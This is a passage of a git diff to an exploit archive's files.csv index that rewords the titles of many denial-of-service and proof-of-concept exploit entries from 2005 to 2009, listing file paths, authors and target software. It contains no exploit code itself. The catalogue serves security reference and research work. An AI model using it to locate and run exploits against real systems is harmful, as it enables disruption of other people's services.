diff --git a/files.csv b/files.csv index b84ba6815..feb4a79da 100644 --- a/files.csv +++ b/files.csv @@ -259,7 +259,7 @@ id,file,description,date,author,platform,type,port 1345,platforms/php/dos/1345.php,"Xaraya 1.0.0 RC4 - create() Denial of Service",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0 -1362,platforms/windows/dos/1362.html,"Mozilla Firefox 1.5 - (history.dat) Looping (PoC)",2005-12-07,ZIPLOCK,windows,dos,0 +1362,platforms/windows/dos/1362.html,"Mozilla Firefox 1.5 - 'history.dat' Looping (PoC)",2005-12-07,ZIPLOCK,windows,dos,0 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos,0 1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 @@ -298,10 +298,10 @@ id,file,description,date,author,platform,type,port 1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server - (MAX_UNAUTH_CLIENTS) Denial of Service",2006-03-10,str0ke,multiple,dos,0 1573,platforms/php/dos/1573.php,"Guppy 4.5.11 - (Delete Databases) Remote Denial of Service",2006-03-10,trueend5,php,dos,0 1593,platforms/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - (IMAP) Denial of Service",2006-03-19,Omni,windows,dos,0 -1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - (script action handlers) 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 -1599,platforms/windows/dos/1599.cpp,"Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0 +1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - Script Action Handlers 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 +1599,platforms/windows/dos/1599.cpp,"Microsoft Windows Server 2003/XP - IGMP v3 Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - (COM Components) Remote Crash",2006-03-22,"Debasis Mohanty",windows,dos,0 -1603,platforms/windows/dos/1603.c,"Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 +1603,platforms/windows/dos/1603.c,"Microsoft Windows Server 2003/XP - IGMP v3 Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",windows,dos,0 1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0 1614,platforms/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0 @@ -320,14 +320,14 @@ id,file,description,date,author,platform,type,port 1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - (Version String) Remote Format String (PoC)",2006-04-23,"Luigi Auriemma",windows,dos,0 1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0 1712,platforms/osx/dos/1712.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 -1715,platforms/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0 +1715,platforms/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - 'ROWSPAN' Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - 'js320.dll/xpcom_core.dll' Denial of Service (PoC)",2006-04-24,splices,multiple,dos,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer - 'parser.exe' Denial of Service",2006-04-26,sh4d0wman,hardware,dos,0 1721,platforms/windows/dos/1721.pl,"BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow (PoC)",2006-04-27,"Dedi Dwianto",windows,dos,0 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow (PoC)",2006-05-03,"Jerome Athias",windows,dos,0 1746,platforms/linux/dos/1746.pl,"zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",linux,dos,0 1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0 -1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos,0 +1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos,0 1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service",2006-05-05,Bigeazer,windows,dos,0 1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0 1758,platforms/windows/dos/1758.pl,"TinyFTPD 1.4 - (USER) Remote Buffer Overflow Denial of Service",2006-05-06,[Oo],windows,dos,0 @@ -347,7 +347,7 @@ id,file,description,date,author,platform,type,port 1856,platforms/windows/dos/1856.url,"Microsoft Internet Explorer 6 - 'inetconn.dll' Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos,0 1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service",2006-06-02,n00b,multiple,dos,0 1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0 -1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos,0 +1894,platforms/linux/dos/1894.py,"0verkill 0.16 - ASCII-ART Game Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos,0 1927,platforms/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos,0 1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0 1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0 @@ -398,8 +398,8 @@ id,file,description,date,author,platform,type,port 2542,platforms/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0 2571,platforms/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,windows,dos,0 2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",multiple,dos,0 -2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - (rebuildpe) Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",multiple,dos,0 -2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12 / 1.2.12.1 - (chan_skinny) Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 +2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",multiple,dos,0 +2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12 / 1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - (RCPT TO) Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - (ADODB Execute) Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0 2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 @@ -416,7 +416,7 @@ id,file,description,date,author,platform,type,port 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service",2006-11-07,"Joxean Koret",windows,dos,0 2783,platforms/windows/dos/2783.html,"WinZip 10.0.7245 - (FileView ActiveX Control) Stack Overflow (PoC)",2006-11-14,prdelka,windows,dos,0 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 - (MKD) Remote Denial of Service",2006-11-15,"Greg Linares",windows,dos,0 -2854,platforms/windows/dos/2854.py,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 +2854,platforms/windows/dos/2854.py,"AT-TFTP 1.9 - 'Long Filename' Remote Buffer Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 2855,platforms/windows/dos/2855.py,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 2857,platforms/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - htmlentities() Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",multiple,dos,0 2860,platforms/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - (Playlist) Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 @@ -580,7 +580,7 @@ id,file,description,date,author,platform,type,port 3940,platforms/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 - Mediasvr.exe Denial of Service",2007-05-16,Shirkdog,windows,dos,0 3945,platforms/linux/dos/3945.rb,"MagicISO 5.4 (build239) - '.cue' Heap Overflow (PoC)",2007-05-17,n00b,linux,dos,0 3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - /AUX / '.aspx' Remote Denial of Service",2007-05-21,kingcope,windows,dos,0 -3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote Denial of Service",2007-05-22,shinnai,windows,dos,0 +3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - 'ltisi14E.ocx 14.5.0.44' Remote Denial of Service",2007-05-22,shinnai,windows,dos,0 3973,platforms/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service",2007-05-23,shinnai,windows,dos,0 3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project - (Company Name) Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project - (Description) Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 @@ -634,7 +634,7 @@ id,file,description,date,author,platform,type,port 4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",linux,dos,0 4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0 -4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - (FPOLE.OCX 6.0.8450.0) - Remote (PoC)",2007-09-06,shinnai,windows,dos,0 +4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,windows,dos,0 4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote Buffer Overflow (PoC)",2007-09-07,shinnai,windows,dos,0 4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 4379,platforms/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,windows,dos,0 @@ -849,12 +849,12 @@ id,file,description,date,author,platform,type,port 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0 7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9 / 2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0 -7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - (Community) Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0 +7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0 7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0 7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos,0 7126,platforms/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (PoC)",2008-11-15,r0ut3r,windows,dos,0 7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",linux,dos,0 -7178,platforms/windows/dos/7178.txt,"BitDefender - (module pdf.xmd) Infinite Loop Denial of Service (PoC)",2008-11-20,ProTeuS,windows,dos,0 +7178,platforms/windows/dos/7178.txt,"BitDefender - Module pdf.xmd Infinite Loop Denial of Service (PoC)",2008-11-20,ProTeuS,windows,dos,0 7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 - '.m3u' Playlist File Remote Buffer Overflow (PoC)",2008-11-24,LiquidWorm,windows,dos,0 7209,platforms/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser - (URL Bar) Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,windows,dos,0 7213,platforms/windows/dos/7213.pl,"W3C Amaya 10.1 Web Browser - 'id' Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,windows,dos,0 @@ -867,7 +867,7 @@ id,file,description,date,author,platform,type,port 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,Encrypt3d.M!nd,windows,dos,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 -7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - (JPEG Parsing) Recursive Stack Overflow (PoC)",2008-12-03,"ilja van sprundel",multiple,dos,0 +7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)",2008-12-03,"ilja van sprundel",multiple,dos,0 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX - 'VSPDFEditorX.ocx' Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local .CCT File Stack Buffer Overflow (PoC)",2008-12-06,Cnaph,windows,dos,0 7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router - Remote Network Down (PoC)",2008-12-08,0in,windows,dos,0 @@ -876,7 +876,7 @@ id,file,description,date,author,platform,type,port 7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic - ActiveX Controls mscomct2.ocx Buffer Overflow (PoC)",2008-12-12,"Jerome Athias",windows,dos,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos,0 7460,platforms/windows/dos/7460.html,"EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0 -7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - (html tag) Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos,0 +7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - HTML Tag Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos,0 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 (Wireless ADSL Router) - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash",2008-12-23,"Jeremy Brown",windows,dos,0 @@ -926,12 +926,12 @@ id,file,description,date,author,platform,type,port 7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 -7902,platforms/windows/dos/7902.txt,"Amaya Web Editor - XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 +7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos,0 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0 7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,windows,dos,0 -7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER - '.m3u' / '.xpl' Local Stack Overflow (PoC)",2009-02-02,AlpHaNiX,windows,dos,0 -7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - (vncviewer.exe) RFB Protocol Remote Code Execution (PoC)",2009-02-02,"Andres Luksenberg",windows,dos,0 +7942,platforms/windows/dos/7942.pl,"Elecard AVC HD player - '.m3u' / '.xpl' Local Stack Overflow (PoC)",2009-02-02,AlpHaNiX,windows,dos,0 +7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - 'vncviewer.exe' RFB Protocol Remote Code Execution (PoC)",2009-02-02,"Andres Luksenberg",windows,dos,0 7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC)",2009-02-03,DATA_SNIPER,windows,dos,0 7985,platforms/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT command Off-by-One Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0 @@ -970,10 +970,10 @@ id,file,description,date,author,platform,type,port 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos,0 -8262,platforms/osx/dos/8262.c,"Apple Mac OSX xnu 1228.3.13 - (zip-notify) Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0 +8262,platforms/osx/dos/8262.c,"Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0 8263,platforms/osx/dos/8263.c,"Apple Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 -8264,platforms/osx/dos/8264.c,"Apple Mac OSX xnu 1228.3.13 - (profil) Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 -8265,platforms/osx/dos/8265.c,"Apple Mac OSX xnu 1228.x - (vfssysctl) Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 +8264,platforms/osx/dos/8264.c,"Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 +8265,platforms/osx/dos/8265.c,"Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0 8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0 @@ -1065,7 +1065,7 @@ id,file,description,date,author,platform,type,port 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos,0 8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0 8832,platforms/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote Buffer Overflow (PoC)",2009-06-01,Nine:Situations:Group,windows,dos,0 -8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - (ID3v1/ID3v2 Tag) Remote Stack Buffer Overflow PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 +8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 8842,platforms/multiple/dos/8842.pl,"Apache mod_dav / svn - Remote Denial of Service",2009-06-01,kingcope,multiple,dos,0 8862,platforms/windows/dos/8862.txt,"Apple QuickTime - Image Description Atom Sign Extension (PoC)",2009-06-03,webDEViL,windows,dos,0 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service",2009-06-04,"Jon Oberheide",multiple,dos,0 @@ -1092,8 +1092,8 @@ id,file,description,date,author,platform,type,port 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer - (AddFavorite) Remote Crash (PoC)",2009-07-09,Sberry,windows,dos,0 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,windows,dos,0 9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 -9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - (.rws Parsing) Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos,0 -9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - (WindsPly.ocx) Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos,0 +9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos,0 +9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos,0 9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' / '.TXT' Local Stack Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - (USER) Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0 @@ -1155,7 +1155,7 @@ id,file,description,date,author,platform,type,port 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",linux,dos,0 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client - 'tgbvpn.sys' Local Denial of Service",2009-08-18,Evilcry,windows,dos,0 -9454,platforms/multiple/dos/9454.txt,"Apple Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos,0 +9454,platforms/multiple/dos/9454.txt,"Apple Safari 4.0.2 - WebKit Parsing of Floating Point Numbers Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos,0 9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - (JavaScript SetAttribute) Remote Crash",2009-08-18,"Irfan Asrar",windows,dos,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,hack4love,windows,dos,0 9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0 @@ -1166,7 +1166,7 @@ id,file,description,date,author,platform,type,port 9506,platforms/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 - '.fft' Crash (PoC)",2009-08-24,the_Edit0r,windows,dos,0 9507,platforms/windows/dos/9507.pl,"AiO (All into One) Flash Mixer 3 - '.afp' Crash (PoC)",2009-08-24,the_Edit0r,windows,dos,0 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre (Multiple Models) - Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0 -9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0 +9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - 'ALLO' Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 9517,platforms/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 9528,platforms/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 - Remote Denial of Service",2009-08-26,"ThE g0bL!N",windows,dos,0 @@ -1224,9 +1224,10 @@ id,file,description,date,author,platform,type,port 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos,0 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,windows,dos,7144 9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,dos,110 -9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80 +9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - Denial of Service (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - Denial of Service",2009-10-14,"Townsend Harris",hardware,dos,0 9969,platforms/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 Denial of 